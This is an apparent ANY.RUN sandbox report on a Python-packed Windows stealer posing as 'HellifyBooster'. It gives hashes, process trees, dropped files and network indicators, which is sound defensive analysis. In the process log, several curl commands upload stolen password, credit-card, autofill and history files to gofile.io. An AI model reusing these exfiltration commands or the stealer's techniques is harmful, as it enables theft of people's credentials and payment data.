File name: HellifyBooster.exe
Full analysis: https://app.any.run/tasks/db1b0a1c-02b9-4ee4-b2e3-a368acd4f60f
Verdict: Malicious activity
Threats:

Stealers are a category of malicious software designed to gain unauthorized access to users' information and transfer it to the attacker. The category covers a range of programs that each focus on a particular kind of data, such as files, passwords, or cryptocurrency wallets. Stealers can also spy on their targets by recording keystrokes and taking screenshots. This type of malware is primarily distributed as part of phishing campaigns.

Analysis date: August 13, 2024, 14:39:39
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags: github, python, pyinstaller, stealer, evasion, discordgrabber, generic, waspstealer, discord
Indicators:
MIME: application/x-dosexec
File info: PE32+ executable (console) x86-64, for MS Windows
MD5: 381C2255C06C5C7D270578B098D947A5
SHA1: 8FC8E1351EBB712E2ED704A920905D2B470C682C
SHA256: B6C6E4DC1708D34EF5F787BA0BA88B6025119B60B6E6858C6E6D7141AFBB9EA2
SSDEEP: 98304:CDZTwrhQiH5yqqDsE1zWyJqab09EqYvh+QHqXNIKsZG0+k7FpcXw9p5j8YjjHz5I:q3rN0+rH8cu

ANY.RUN is an interactive service that gives the analyst full access to the guest system. Information in this report may therefore be distorted by user actions and is provided as-is, for the user's information. ANY.RUN does not guarantee that the content is malicious or safe.
  • MALICIOUS
    • Actions look like stealing of personal data
      • HellifySniper.exe (PID: 6652)
    • Create files in the Startup directory
      • HellifySniper.exe (PID: 6652)
    • DISCORDGRABBER has been detected (YARA)
      • HellifySniper.exe (PID: 6652)
    • WASPSTEALER has been detected (YARA)
      • HellifySniper.exe (PID: 6652)
  • SUSPICIOUS
    • Drops the executable file immediately after the start
      • HellifyBooster.exe (PID: 6296)
      • HellifyBooster.exe (PID: 6364)
      • HellifySniper.exe (PID: 6628)
      • HellifySniper.exe (PID: 6652)
    • Application launched itself
      • HellifyBooster.exe (PID: 6296)
      • HellifySniper.exe (PID: 6628)
    • Process drops legitimate windows executable
      • HellifyBooster.exe (PID: 6296)
      • HellifySniper.exe (PID: 6628)
    • The process drops C-runtime libraries
      • HellifyBooster.exe (PID: 6296)
      • HellifySniper.exe (PID: 6628)
    • Process drops python dynamic module
      • HellifyBooster.exe (PID: 6296)
      • HellifySniper.exe (PID: 6628)
    • Executable content was dropped or overwritten
      • HellifyBooster.exe (PID: 6296)
      • HellifyBooster.exe (PID: 6364)
      • HellifySniper.exe (PID: 6628)
      • HellifySniper.exe (PID: 6652)
    • Loads Python modules
      • HellifyBooster.exe (PID: 6364)
      • HellifySniper.exe (PID: 6652)
    • Starts CMD.EXE for commands execution
      • HellifyBooster.exe (PID: 6364)
      • HellifySniper.exe (PID: 6652)
    • Checks for external IP
      • svchost.exe (PID: 2256)
      • HellifySniper.exe (PID: 6652)
    • Data upload via CURL
      • curl.exe (PID: 208)
      • curl.exe (PID: 6164)
      • curl.exe (PID: 2532)
      • curl.exe (PID: 6788)
      • curl.exe (PID: 2804)
      • curl.exe (PID: 6052)
    • There is functionality for taking screenshot (YARA)
      • HellifyBooster.exe (PID: 6364)
  • INFO
    • Create files in a temporary directory
      • HellifyBooster.exe (PID: 6296)
      • HellifyBooster.exe (PID: 6364)
      • HellifySniper.exe (PID: 6628)
      • HellifySniper.exe (PID: 6652)
    • Reads the computer name
      • HellifyBooster.exe (PID: 6296)
      • HellifyBooster.exe (PID: 6364)
      • HellifySniper.exe (PID: 6628)
      • HellifySniper.exe (PID: 6652)
      • curl.exe (PID: 6164)
      • curl.exe (PID: 208)
      • curl.exe (PID: 2532)
    • Checks supported languages
      • HellifyBooster.exe (PID: 6296)
      • HellifyBooster.exe (PID: 6364)
      • HellifySniper.exe (PID: 6628)
      • HellifySniper.exe (PID: 6652)
      • curl.exe (PID: 208)
      • curl.exe (PID: 6164)
      • curl.exe (PID: 2804)
      • curl.exe (PID: 6788)
      • curl.exe (PID: 6052)
      • curl.exe (PID: 2532)
    • Checks proxy server information
      • HellifyBooster.exe (PID: 6364)
      • HellifySniper.exe (PID: 6652)
    • PyInstaller has been detected (YARA)
      • HellifyBooster.exe (PID: 6296)
      • HellifySniper.exe (PID: 6652)
      • HellifyBooster.exe (PID: 6364)
      • HellifySniper.exe (PID: 6628)
    • Creates files or folders in the user directory
      • HellifySniper.exe (PID: 6652)
    • Attempting to use instant messaging service
      • HellifySniper.exe (PID: 6652)
      • svchost.exe (PID: 2256)
No Malware configuration.

TRiD

.exe | Win64 Executable (generic) (87.3)
.exe | Generic Win/DOS Executable (6.3)
.exe | DOS Executable Generic (6.3)

EXIF

EXE

MachineType: AMD AMD64
TimeStamp: 2024:07:12 14:16:03+00:00
ImageFileCharacteristics: Executable, Large address aware
PEType: PE32+
LinkerVersion: 14.4
CodeSize: 173056
InitializedDataSize: 151040
UninitializedDataSize: -
EntryPoint: 0xb4d0
OSVersion: 6
ImageVersion: -
SubsystemVersion: 6
Subsystem: Windows command line
No data.
Total processes: 157
Monitored processes: 26
Malicious processes: 4
Suspicious processes: 1

Behavior graph

Process nodes, in the order shown in the graph (THREAT marks a node flagged as malicious):
start, THREAT hellifybooster.exe, conhost.exe (no specs), THREAT hellifybooster.exe, cmd.exe (no specs), THREAT hellifysniper.exe, #DISCORDGRABBER hellifysniper.exe, svchost.exe, cmd.exe (no specs), conhost.exe (no specs), curl.exe, cmd.exe (no specs), conhost.exe (no specs), curl.exe, cmd.exe (no specs), conhost.exe (no specs), curl.exe, cmd.exe (no specs), conhost.exe (no specs), curl.exe (no specs), cmd.exe (no specs), conhost.exe (no specs), curl.exe (no specs), cmd.exe (no specs), conhost.exe (no specs), curl.exe (no specs), cmd.exe (no specs)

Process information

PID: 208
CMD: curl -F "file=@C:\Users\admin\AppData\Local\Temp\cspasswords.txt" https://store9.gofile.io/uploadFile
Path: C:\Windows\System32\curl.exe
Parent process: cmd.exe
User: admin
Company: curl, https://curl.se/
Integrity Level: MEDIUM
Description: The curl executable
Exit code: 0
Version: 8.4.0
Modules (images): c:\windows\system32\curl.exe, c:\windows\system32\ntdll.dll, c:\windows\system32\kernel32.dll, c:\windows\system32\kernelbase.dll, c:\windows\system32\apphelp.dll, c:\windows\system32\ws2_32.dll, c:\windows\system32\rpcrt4.dll, c:\windows\system32\bcrypt.dll, c:\windows\system32\crypt32.dll, c:\windows\system32\ucrtbase.dll

PID: 1568
CMD: C:\WINDOWS\system32\cmd.exe /c title Hellify Booster
Path: C:\Windows\System32\cmd.exe
Parent process: HellifyBooster.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Command Processor
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images): c:\windows\system32\cmd.exe, c:\windows\system32\ntdll.dll, c:\windows\system32\kernel32.dll, c:\windows\system32\kernelbase.dll, c:\windows\system32\apphelp.dll, c:\windows\system32\msvcrt.dll, c:\windows\system32\combase.dll, c:\windows\system32\ucrtbase.dll, c:\windows\system32\rpcrt4.dll

PID: 2256
CMD: C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s Dnscache
Path: C:\Windows\System32\svchost.exe
Parent process: services.exe
User: NETWORK SERVICE
Company: Microsoft Corporation
Integrity Level: SYSTEM
Description: Host Process for Windows Services
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images): c:\windows\system32\svchost.exe, c:\windows\system32\ntdll.dll, c:\windows\system32\kernel32.dll, c:\windows\system32\kernelbase.dll, c:\windows\system32\sechost.dll, c:\windows\system32\rpcrt4.dll, c:\windows\system32\bcrypt.dll, c:\windows\system32\ucrtbase.dll, c:\windows\system32\combase.dll, c:\windows\system32\kernel.appcore.dll

PID: 2468
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Console Window Host
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images): c:\windows\system32\conhost.exe, c:\windows\system32\ntdll.dll, c:\windows\system32\kernel32.dll, c:\windows\system32\kernelbase.dll, c:\windows\system32\msvcp_win.dll, c:\windows\system32\ucrtbase.dll, c:\windows\system32\shcore.dll, c:\windows\system32\msvcrt.dll, c:\windows\system32\combase.dll, c:\windows\system32\rpcrt4.dll

PID: 2532
CMD: curl -F "file=@C:\Users\admin\AppData\Local\Temp\cscreditcards.txt" https://store9.gofile.io/uploadFile
Path: C:\Windows\System32\curl.exe
Parent process: cmd.exe
User: admin
Company: curl, https://curl.se/
Integrity Level: MEDIUM
Description: The curl executable
Exit code: 0
Version: 8.4.0
Modules (images): c:\windows\system32\curl.exe, c:\windows\system32\ntdll.dll, c:\windows\system32\kernel32.dll, c:\windows\system32\kernelbase.dll, c:\windows\system32\apphelp.dll, c:\windows\system32\ws2_32.dll, c:\windows\system32\rpcrt4.dll, c:\windows\system32\bcrypt.dll, c:\windows\system32\crypt32.dll, c:\windows\system32\ucrtbase.dll

PID: 2804
CMD: curl -F "file=@C:\Users\admin\AppData\Local\Temp\csautofills.txt" https://store9.gofile.io/uploadFile
Path: C:\Windows\System32\curl.exe
Parent process: cmd.exe
User: admin
Company: curl, https://curl.se/
Integrity Level: MEDIUM
Description: The curl executable
Exit code: 26
Version: 8.4.0
Modules (images): c:\windows\system32\curl.exe, c:\windows\system32\ntdll.dll, c:\windows\system32\kernel32.dll, c:\windows\system32\kernelbase.dll, c:\windows\system32\apphelp.dll, c:\windows\system32\ws2_32.dll, c:\windows\system32\rpcrt4.dll, c:\windows\system32\bcrypt.dll, c:\windows\system32\crypt32.dll, c:\windows\system32\cryptsp.dll

PID: 3844
CMD: C:\WINDOWS\system32\cmd.exe /c "curl -F "file=@C:\Users\admin\AppData\Local\Temp\cspasswords.txt" https://store9.gofile.io/uploadFile"
Path: C:\Windows\System32\cmd.exe
Parent process: HellifySniper.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Command Processor
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images): c:\windows\system32\cmd.exe, c:\windows\system32\ntdll.dll, c:\windows\system32\kernel32.dll, c:\windows\system32\kernelbase.dll, c:\windows\system32\apphelp.dll, c:\windows\system32\msvcrt.dll, c:\windows\system32\combase.dll, c:\windows\system32\ucrtbase.dll, c:\windows\system32\rpcrt4.dll, c:\windows\system32\sechost.dll

PID: 5136
CMD: C:\WINDOWS\system32\cmd.exe /c "curl -F "file=@C:\Users\admin\AppData\Local\Temp\cshistories.txt" https://store9.gofile.io/uploadFile"
Path: C:\Windows\System32\cmd.exe
Parent process: HellifySniper.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Command Processor
Exit code: 26
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images): c:\windows\system32\cmd.exe, c:\windows\system32\ntdll.dll, c:\windows\system32\kernel32.dll, c:\windows\system32\kernelbase.dll, c:\windows\system32\apphelp.dll, c:\windows\system32\msvcrt.dll, c:\windows\system32\combase.dll, c:\windows\system32\ucrtbase.dll, c:\windows\system32\rpcrt4.dll, c:\windows\system32\sechost.dll

PID: 5888
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Console Window Host
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images): c:\windows\system32\conhost.exe, c:\windows\system32\ntdll.dll, c:\windows\system32\kernel32.dll, c:\windows\system32\kernelbase.dll, c:\windows\system32\msvcp_win.dll, c:\windows\system32\ucrtbase.dll, c:\windows\system32\shcore.dll, c:\windows\system32\msvcrt.dll, c:\windows\system32\combase.dll, c:\windows\system32\rpcrt4.dll

PID: 5916
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Console Window Host
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images): c:\windows\system32\conhost.exe, c:\windows\system32\ntdll.dll, c:\windows\system32\kernel32.dll, c:\windows\system32\kernelbase.dll, c:\windows\system32\msvcp_win.dll, c:\windows\system32\ucrtbase.dll, c:\windows\system32\shcore.dll, c:\windows\system32\msvcrt.dll, c:\windows\system32\combase.dll, c:\windows\system32\rpcrt4.dll
Total events: 6 237
Read events: 6 237
Write events: 0
Delete events: 0

Modification events

No data

Executable files: 167
Suspicious files: 2
Text files: 3
Unknown types: 9

Dropped files

PID | Process | Filename | Type
6296 | HellifyBooster.exe | C:\Users\admin\AppData\Local\Temp\_MEI62962\PIL\_imagingmath.cp312-win_amd64.pyd | executable
  MD5: D80E23C523BEA5ACA6EC702EF6DCBF8D  SHA256: C480EDC4EBD5757B92F543B0589AF0C6FEBF1153992B948322B7E69F2A0EAF61
6296 | HellifyBooster.exe | C:\Users\admin\AppData\Local\Temp\_MEI62962\PIL\_imagingtk.cp312-win_amd64.pyd | executable
  MD5: 6469B7315A33774D1C7EF7459058F889  SHA256: 317E4219DE122F058C86F858F11B9510B6D196FD8027DD35352E7784E6968500
6296 | HellifyBooster.exe | C:\Users\admin\AppData\Local\Temp\_MEI62962\PIL\_imagingcms.cp312-win_amd64.pyd | executable
  MD5: 30CEC332935A3E27B399A0939BDBECD7  SHA256: 91D0D471C50CFCC9FD8688AE2350477408BB987E67A1C5F508D17C5DD021314F
6296 | HellifyBooster.exe | C:\Users\admin\AppData\Local\Temp\_MEI62962\VCRUNTIME140.dll | executable
  MD5: BE8DBE2DC77EBE7F88F910C61AEC691A  SHA256: 4D292623516F65C80482081E62D5DADB759DC16E851DE5DB24C3CBB57B87DB83
6296 | HellifyBooster.exe | C:\Users\admin\AppData\Local\Temp\_MEI62962\api-ms-win-core-console-l1-1-0.dll | executable
  MD5: E8B9D74BFD1F6D1CC1D99B24F44DA796  SHA256: B1B3FD40AB437A43C8DB4994CCFFC7F88000CC8BB6E34A2BCBFF8E2464930C59
6296 | HellifyBooster.exe | C:\Users\admin\AppData\Local\Temp\_MEI62962\_hashlib.pyd | executable
  MD5: DA02CEFD8151ECB83F697E3BD5280775  SHA256: FD77A5756A17EC0788989F73222B0E7334DD4494B8C8647B43FE554CF3CFB354
6296 | HellifyBooster.exe | C:\Users\admin\AppData\Local\Temp\_MEI62962\_lzma.pyd | executable
  MD5: 195DEFE58A7549117E06A57029079702  SHA256: 7BF9FF61BABEBD90C499A8ED9B62141F947F90D87E0BBD41A12E99D20E06954A
6296 | HellifyBooster.exe | C:\Users\admin\AppData\Local\Temp\_MEI62962\_bz2.pyd | executable
  MD5: 5BEBC32957922FE20E927D5C4637F100  SHA256: 3ED0E5058D370FB14AA5469D81F96C5685559C054917C7280DD4125F21D25F62
6296 | HellifyBooster.exe | C:\Users\admin\AppData\Local\Temp\_MEI62962\_decimal.pyd | executable
  MD5: 492C0C36D8ED1B6CA2117869A09214DA  SHA256: B8221D1C9E2C892DD6227A6042D1E49200CD5CB82ADBD998E4A77F4EE0E9ABF1
6296 | HellifyBooster.exe | C:\Users\admin\AppData\Local\Temp\_MEI62962\VCRUNTIME140_1.dll | executable
  MD5: F8DFA78045620CF8A732E67D1B1EB53D  SHA256: A113F192195F245F17389E6ECBED8005990BCB2476DDAD33F7C4C6C86327AFE5
HTTP(S) requests: 5
TCP/UDP connections: 64
DNS requests: 25
Threats: 26

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
6140 | svchost.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | unknown | - | - | whitelisted
5336 | SearchApp.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D | unknown | - | - | whitelisted
6724 | backgroundTaskHost.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAn5bsKVVV8kdJ6vHl3O1J0%3D | unknown | - | - | whitelisted
2968 | svchost.exe | GET | 304 | 88.221.169.173:80 | http://x1.c.lencr.org/ | unknown | - | - | whitelisted
6764 | backgroundTaskHost.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAn5bsKVVV8kdJ6vHl3O1J0%3D | unknown | - | - | whitelisted

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
4 | System | 192.168.100.255:138 | - | - | - | whitelisted
3888 | svchost.exe | 239.255.255.250:1900 | - | - | - | whitelisted
4576 | svchost.exe | 40.127.240.158:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | unknown
2120 | MoUsoCoreWorker.exe | 40.127.240.158:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | unknown
1076 | RUXIMICS.exe | 40.127.240.158:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | unknown
6364 | HellifyBooster.exe | 185.199.111.133:443 | raw.githubusercontent.com | FASTLY | US | unknown
4576 | svchost.exe | 51.104.136.2:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
6652 | HellifySniper.exe | 172.67.75.40:443 | rentry.co | CLOUDFLARENET | US | unknown
6652 | HellifySniper.exe | 104.26.13.205:443 | api.ipify.org | CLOUDFLARENET | US | unknown
6652 | HellifySniper.exe | 51.38.43.18:443 | api.gofile.io | OVH SAS | FR | unknown

DNS requests

Domain | IP | Reputation
settings-win.data.microsoft.com | 40.127.240.158, 51.104.136.2, 4.231.128.59, 20.73.194.208 | whitelisted
google.com | 142.250.185.206 | whitelisted
raw.githubusercontent.com | 185.199.111.133, 185.199.108.133, 185.199.109.133, 185.199.110.133 | shared
rentry.co | 172.67.75.40, 104.26.2.16, 104.26.3.16 | unknown
api.ipify.org | 104.26.13.205, 104.26.12.205, 172.67.74.152 | shared
api.gofile.io | 51.38.43.18, 45.112.123.126 | whitelisted
geolocation-db.com | 159.89.102.253 | whitelisted
www.bing.com | 184.86.251.25, 184.86.251.7, 184.86.251.4, 184.86.251.5, 184.86.251.24, 184.86.251.23, 184.86.251.20, 184.86.251.28, 184.86.251.9 | whitelisted
ocsp.digicert.com | 192.229.221.95 | whitelisted
login.live.com | 20.190.160.14, 20.190.160.17, 40.126.32.140, 20.190.160.20, 40.126.32.138, 40.126.32.133, 20.190.160.22, 40.126.32.134 | whitelisted

Threats

PID | Process | Class | Message
2256 | svchost.exe | Not Suspicious Traffic | INFO [ANY.RUN] Attempting to access raw user content on GitHub
2256 | svchost.exe | Misc activity | ET INFO Pastebin Service Domain in DNS Lookup (rentry .co)
6652 | HellifySniper.exe | Misc activity | ET INFO Observed Pastebin Service Domain (rentry .co in TLS SNI)
6652 | HellifySniper.exe | Misc activity | ET INFO Observed Pastebin Service Domain (rentry .co in TLS SNI)
6652 | HellifySniper.exe | Misc activity | ET INFO Observed Pastebin Service Domain (rentry .co in TLS SNI)
6652 | HellifySniper.exe | Misc activity | ET INFO Observed Pastebin Service Domain (rentry .co in TLS SNI)
2256 | svchost.exe | Misc activity | ET INFO External IP Lookup Domain (ipify .org) in DNS Lookup
6652 | HellifySniper.exe | Misc activity | ET INFO External IP Address Lookup Domain (ipify .org) in TLS SNI
2256 | svchost.exe | Potentially Bad Traffic | ET INFO Online File Storage Domain in DNS Lookup (gofile .io)
6652 | HellifySniper.exe | Misc activity | ET INFO File Sharing Related Domain in TLS SNI (gofile .io)
1 ETPRO signature available in the full report
No debug info